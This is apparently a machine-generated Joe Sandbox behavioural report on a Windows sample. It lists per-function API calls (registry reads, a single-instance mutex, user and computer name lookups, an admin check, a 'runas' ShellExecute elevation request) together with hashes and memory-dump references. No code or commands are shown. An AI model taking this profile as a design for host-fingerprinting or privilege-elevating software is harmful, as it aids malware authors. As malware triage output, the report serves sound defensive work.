                                                                                                control_flow_graph 3873 cb4710-cb476e call cc35b0 GetVersionExW 3876 cb477d-cb479d call cc1350 call cb2b70 3873->3876 3877 cb4770-cb477c 3873->3877 3882 cb479f 3876->3882 3883 cb47a1-cb47bf call cc1350 call cb2b70 3876->3883 3882->3883 3888 cb47c3-cb47da GetModuleHandleA GetProcAddress 3883->3888 3889 cb47c1 3883->3889 3890 cb4808-cb4820 3888->3890 3891 cb47dc-cb47e8 3888->3891 3889->3888 3894 cb484a-cb4862 3890->3894 3895 cb4822-cb482e 3890->3895 3892 cb47ea-cb47f8 3891->3892 3893 cb47fe-cb4805 call cc2870 3891->3893 3892->3893 3896 cb489d-cb48a2 call cc6fe4 3892->3896 3893->3890 3900 cb4868 GetSystemInfo 3894->3900 3901 cb4864-cb4866 GetNativeSystemInfo 3894->3901 3898 cb4840-cb4847 call cc2870 3895->3898 3899 cb4830-cb483e 3895->3899 3898->3894 3899->3896 3899->3898 3902 cb486e-cb4875 3900->3902 3901->3902 3906 cb4877-cb487f 3902->3906 3907 cb4895-cb489c 3902->3907 3910 cb488e-cb4891 3906->3910 3911 cb4881-cb488d 3906->3911 3910->3907 3912 cb4893 3910->3912 3912->3907
                                                                                                APIs
                                                                                                • GetVersionExW.KERNEL32(0000011C), ref: 00CB4766
                                                                                                • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00CB47C5
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00CB47CC
                                                                                                • GetNativeSystemInfo.KERNELBASE(?), ref: 00CB4864
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressHandleInfoModuleNativeProcSystemVersion
                                                                                                • String ID:
                                                                                                • API String ID: 2167034304-0
                                                                                                • Opcode ID: 58f49fa580a05ba186dcbd2e199e91e34d6026a2910ec91d837914a266cf64d2
                                                                                                • Instruction ID: 8d1c8caa6e2a4c8f70d8fc5c8f5417e784808d80fc66e42f43e1379c7acc72c9
                                                                                                • Opcode Fuzzy Hash: 58f49fa580a05ba186dcbd2e199e91e34d6026a2910ec91d837914a266cf64d2
                                                                                                • Instruction Fuzzy Hash: 01416831D142589BDB18AB68DC4ABDDBB75EF41314F404269EC00E72D2EB369A80C7D2
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetFileType.KERNELBASE(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00CC51F0), ref: 00CC52E0
                                                                                                • GetFileInformationByHandle.KERNELBASE(?,?), ref: 00CC533A
                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00CC51F0,?,000000FF,00000000,00000000), ref: 00CC53C8
                                                                                                • __dosmaperr.LIBCMT ref: 00CC53CF
                                                                                                • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 00CC540C
                                                                                                  • Part of subcall function 00CC5634: __dosmaperr.LIBCMT ref: 00CC5669
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                • String ID:
                                                                                                • API String ID: 1206951868-0
                                                                                                • Opcode ID: c202f483cd91f74c0c0ec7b29006a497567bb552cf9160d308ced3f44ce68773
                                                                                                • Instruction ID: 4a6119b25b19cb0be12a717063787b324fdcc154e11b3cc3fc8fa50e17d7c47c
                                                                                                • Opcode Fuzzy Hash: c202f483cd91f74c0c0ec7b29006a497567bb552cf9160d308ced3f44ce68773
                                                                                                • Instruction Fuzzy Hash: A4414D75900B44ABCB24DFA5DC45EAFBBF9EF88340B14452EF956D3660E730A980DB21
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 00CB2B70: RegOpenKeyExA.KERNELBASE(?,00000400,00000000,00000001,?,?,777D6490), ref: 00CB2CC1
                                                                                                  • Part of subcall function 00CB2B70: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400,?,00000400,00000000,00000001,?,?,777D6490), ref: 00CB2CE9
                                                                                                  • Part of subcall function 00CB2B70: RegCloseKey.KERNELBASE(?,?,00000400,00000000,00000001,?,?,777D6490), ref: 00CB2CF2
                                                                                                  • Part of subcall function 00CC1350: Concurrency::cancel_current_task.LIBCPMT ref: 00CC1404
                                                                                                • Sleep.KERNEL32(00001388), ref: 00CBB1FD
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseConcurrency::cancel_current_taskOpenQuerySleepValue
                                                                                                • String ID: EG==$EwC+$ydLx9XH2
                                                                                                • API String ID: 57365020-3990103438
                                                                                                • Opcode ID: 03f0d7d7d2363a1537edd62d21635a3b6f71c70216dedd6263d07c2f4cc43972
                                                                                                • Instruction ID: 6e73671e78a588f1e1e08fafa1fd571b0038ece375951e2808c46eebcd5951aa
                                                                                                • Opcode Fuzzy Hash: 03f0d7d7d2363a1537edd62d21635a3b6f71c70216dedd6263d07c2f4cc43972
                                                                                                • Instruction Fuzzy Hash: 35C14671A101489BEB08DF68CD85BEDBB62AF81308F14825CF815973E7DB75DE818B91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • _free.LIBCMT ref: 00CD0031
                                                                                                • _free.LIBCMT ref: 00CD0087
                                                                                                  • Part of subcall function 00CCFE62: _free.LIBCMT ref: 00CCFEBA
                                                                                                  • Part of subcall function 00CCFE62: GetTimeZoneInformation.KERNELBASE(?,00000000,00000000,00000000,?,00CDE710), ref: 00CCFECC
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$InformationTimeZone
                                                                                                • String ID:
                                                                                                • API String ID: 597776487-0
                                                                                                • Opcode ID: ee2c8ddcbb41000b602f52650285a27457dead6e3e45314482006dabefedf248
                                                                                                • Instruction ID: 118578534143abc97205c42a003d11cfb413a5a8a7e205f9cbe17b4cecd0df68
                                                                                                • Opcode Fuzzy Hash: ee2c8ddcbb41000b602f52650285a27457dead6e3e45314482006dabefedf248
                                                                                                • Instruction Fuzzy Hash: 60210B7280025976CB31A7299C85FEF77789F41360F20029FE6A4A7281EFB0AE859591
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetEnvironmentStringsW.KERNEL32 ref: 00CCC991
                                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00CCC9FF
                                                                                                  • Part of subcall function 00CCC8A4: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,00CD24A0,?,00000000,00000000), ref: 00CCC946
                                                                                                  • Part of subcall function 00CC8E3A: RtlAllocateHeap.NTDLL(00000000,00CC0FAC,?,?,00CC2609,00CC0FAC,?,00CC13D8,E800CE42,777D6490), ref: 00CC8E6C
                                                                                                • _free.LIBCMT ref: 00CCC9F0
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: EnvironmentStrings$AllocateByteCharFreeHeapMultiWide_free
                                                                                                • String ID:
                                                                                                • API String ID: 2560199156-0
                                                                                                • Opcode ID: 58e45579ff4465d14b0caac06f7a1320bd68b6632e2ca5b74481e19599a2e61b
                                                                                                • Instruction ID: ee14c4acea2d21c7fdcfa3ae4d28ec7e709aa7fe7e149d60b1d8a3eaaa8d323f
                                                                                                • Opcode Fuzzy Hash: 58e45579ff4465d14b0caac06f7a1320bd68b6632e2ca5b74481e19599a2e61b
                                                                                                • Instruction Fuzzy Hash: C901DB736016157B672116BBDCC9F7F696DCDC2BA0315012DFA1DD2140EE70CD02A1B1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 00CB8570: GetTempPathA.KERNEL32(00000104,?), ref: 00CB85D7
                                                                                                  • Part of subcall function 00CB6CC0: CreateMutexA.KERNELBASE(00000000,00000000,00CE4194), ref: 00CB6CD8
                                                                                                  • Part of subcall function 00CB6CC0: GetLastError.KERNEL32 ref: 00CB6CDE
                                                                                                  • Part of subcall function 00CB5240: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00CB525A
                                                                                                  • Part of subcall function 00CB8AA0: GetUserNameA.ADVAPI32(?,?), ref: 00CB8B9F
                                                                                                  • Part of subcall function 00CB8AA0: SetCurrentDirectoryA.KERNEL32(00000000,?,?), ref: 00CB8BEA
                                                                                                  • Part of subcall function 00CBFB50: IsUserAnAdmin.SHELL32 ref: 00CBFB80
                                                                                                  • Part of subcall function 00CBFB50: GetUserNameA.ADVAPI32(?,00000104), ref: 00CBFC02
                                                                                                  • Part of subcall function 00CBFB50: GetComputerNameExW.KERNEL32(00000002,?,00000104,?,?), ref: 00CBFC5C
                                                                                                • CreateThread.KERNELBASE(00000000,00000000,Function_00010F90,00000000,00000000,00000000), ref: 00CC1046
                                                                                                • CreateThread.KERNELBASE(00000000,00000000,Function_00010FE0,00000000,00000000,00000000), ref: 00CC1057
                                                                                                • Sleep.KERNELBASE(00007530), ref: 00CC1065
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Name$CreateUser$Thread$AdminComputerCurrentDirectoryErrorFileLastModuleMutexPathSleepTemp
                                                                                                • String ID:
                                                                                                • API String ID: 2761908639-0
                                                                                                • Opcode ID: 66d6b7b9a4461879300485c441668bd7ea586e03b55acb861c2c987877c309e1
                                                                                                • Instruction ID: a5ddeecd62c4753e58f407b64c362bdac1b0afc23de0d547ae76866745bf5a94
                                                                                                • Opcode Fuzzy Hash: 66d6b7b9a4461879300485c441668bd7ea586e03b55acb861c2c987877c309e1
                                                                                                • Instruction Fuzzy Hash: 03F03975BD971466F53033A98C13F9D39084B41B91F64012ABB093F2C39CC5788862EB
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • ShellExecuteA.SHELL32(00000000,00000001,?,?,00000000,00000000), ref: 00CB36ED
                                                                                                • Sleep.KERNEL32(00000064,?), ref: 00CB38F6
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ExecuteShellSleep
                                                                                                • String ID: runas
                                                                                                • API String ID: 4194306370-4000483414
                                                                                                • Opcode ID: dd6382f5e4078daac85eeb9944274b84aad0dfa63989812064ccf48c53ac64a8
                                                                                                • Instruction ID: 75af065e3e951865bc31cebe084e487798d8bc5d5d158274a8c53be233f98c9e
                                                                                                • Opcode Fuzzy Hash: dd6382f5e4078daac85eeb9944274b84aad0dfa63989812064ccf48c53ac64a8
                                                                                                • Instruction Fuzzy Hash: 1A5146B12101846BEB08EE28CD85FDE77A6EF86344F54861CF845C72D6EB35DA858B81
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 7019a6005362b8ba804a8a9788fb63b746e4c5f44458fc258f3c879864a093a8
                                                                                                • Instruction ID: b337a13fb0eedf85e4dd20eb7a0d5ba2b933aa5b4d849e26f186b0b4fc48c006
                                                                                                • Opcode Fuzzy Hash: 7019a6005362b8ba804a8a9788fb63b746e4c5f44458fc258f3c879864a093a8
                                                                                                • Instruction Fuzzy Hash: A521C532901608BBEB116BA4EC46F9E37689F41374F250359F9342B1D1DB70BE46A6A1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • FileTimeToSystemTime.KERNEL32(00000000,?,?,?,?,00CC5365,?,?,00000000,00000000), ref: 00CC545C
                                                                                                • SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,?,?,?,?,00CC5365,?,?,00000000,00000000), ref: 00CC5470
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Time$System$FileLocalSpecific
                                                                                                • String ID:
                                                                                                • API String ID: 1707611234-0
                                                                                                • Opcode ID: 87f71a848e8da7579f3d4ec922812bfb7114ea98df906d29208cf78c6cab9cb6
                                                                                                • Instruction ID: 39f4c5d46610511dd4a494477e61b38a1b1fcd4f56b3d4dd1e42420316ddc9d8
                                                                                                • Opcode Fuzzy Hash: 87f71a848e8da7579f3d4ec922812bfb7114ea98df906d29208cf78c6cab9cb6
                                                                                                • Instruction Fuzzy Hash: 5C11DD7690050CABCB14DF95C884FDF77BCAF08321F50426AE516E6181EB34EB89DB61
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free
                                                                                                • String ID:
                                                                                                • API String ID: 269201875-0
                                                                                                • Opcode ID: 252974ad849cd30052fb0cf0a861e9d69d906029d4fdec886b5692808b0209e6
                                                                                                • Instruction ID: 96753866f3076c288bc7521f2536128210f94e2fc7882328f2a517e3e5f92c7b
                                                                                                • Opcode Fuzzy Hash: 252974ad849cd30052fb0cf0a861e9d69d906029d4fdec886b5692808b0209e6
                                                                                                • Instruction Fuzzy Hash: C2E0922360E51146D625673BFC85F7E1659EBC1331F22032EF424CB2E1DF7489467A62
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,00CE4194), ref: 00CB6CD8
                                                                                                • GetLastError.KERNEL32 ref: 00CB6CDE
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateErrorLastMutex
                                                                                                • String ID:
                                                                                                • API String ID: 1925916568-0
                                                                                                • Opcode ID: 06117c57fff96183b38d91824d33152737f86ebdf00a873eb75ac1934e5676d5
                                                                                                • Instruction ID: 16fc617ebfa8d8b6ec2d42a079a02db85c9055ba85150208a07a8731cff54aa8
                                                                                                • Opcode Fuzzy Hash: 06117c57fff96183b38d91824d33152737f86ebdf00a873eb75ac1934e5676d5
                                                                                                • Instruction Fuzzy Hash: C2D01230248280EFFB0C6B65DC9DB1E3765E720702F344424F32AC94F1C760A8808B22
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetFileAttributesA.KERNELBASE(00000000), ref: 00CB5FFE
                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,00CE4194), ref: 00CB6CD8
                                                                                                • GetLastError.KERNEL32 ref: 00CB6CDE
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AttributesCreateErrorFileLastMutex
                                                                                                • String ID:
                                                                                                • API String ID: 3621940766-0
                                                                                                • Opcode ID: 5dcd4289085cd651b2e306a156104abb2621801e2738610b90d5d5b909f51c7d
                                                                                                • Instruction ID: 3e3935c8ece6f18ffc41d4d742674f82a8c6707c20a3671081d04d10a7f0d443
                                                                                                • Opcode Fuzzy Hash: 5dcd4289085cd651b2e306a156104abb2621801e2738610b90d5d5b909f51c7d
                                                                                                • Instruction Fuzzy Hash: 5D210571B001045BEB28DB69ED85BAEBA62DF81315F20865CF0959B3D6CB7E89C18B44
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetFileAttributesA.KERNELBASE(00000000), ref: 00CB635E
                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,00CE4194), ref: 00CB6CD8
                                                                                                • GetLastError.KERNEL32 ref: 00CB6CDE
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AttributesCreateErrorFileLastMutex
                                                                                                • String ID:
                                                                                                • API String ID: 3621940766-0
                                                                                                • Opcode ID: e07aad22c0835f474f0b55176d07b9e853e81e79cd40ddab93fed495f696d815
                                                                                                • Instruction ID: f040a1e6fb08cc137a864ef2461be0e56a78d31d3cdffdca3bfc5cefd588107a
                                                                                                • Opcode Fuzzy Hash: e07aad22c0835f474f0b55176d07b9e853e81e79cd40ddab93fed495f696d815
                                                                                                • Instruction Fuzzy Hash: B42127717101045BEB18CB78DDC9BADBBA2DF82314F24861CF0969B3E6DB7D99818B50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetFileAttributesA.KERNELBASE(00000000), ref: 00CB647E
                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,00CE4194), ref: 00CB6CD8
                                                                                                • GetLastError.KERNEL32 ref: 00CB6CDE
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AttributesCreateErrorFileLastMutex
                                                                                                • String ID:
                                                                                                • API String ID: 3621940766-0
                                                                                                • Opcode ID: 3c7dc2b102ae0e392d915df9f889770c6f797818b65b60432ffd751a628f5a6b
                                                                                                • Instruction ID: de55773976cd30207e50ebfe64333a9c92f826e5035e6c8c75632cca55a10fd7
                                                                                                • Opcode Fuzzy Hash: 3c7dc2b102ae0e392d915df9f889770c6f797818b65b60432ffd751a628f5a6b
                                                                                                • Instruction Fuzzy Hash: 3B2107317001045BEB28CB78DD85BADBB62EF81314F20461CE0969B3D6CB7DD9858B40
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetFileAttributesA.KERNELBASE(00000000), ref: 00CB659E
                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,00CE4194), ref: 00CB6CD8
                                                                                                • GetLastError.KERNEL32 ref: 00CB6CDE
                                                                                                Memory Dump Source
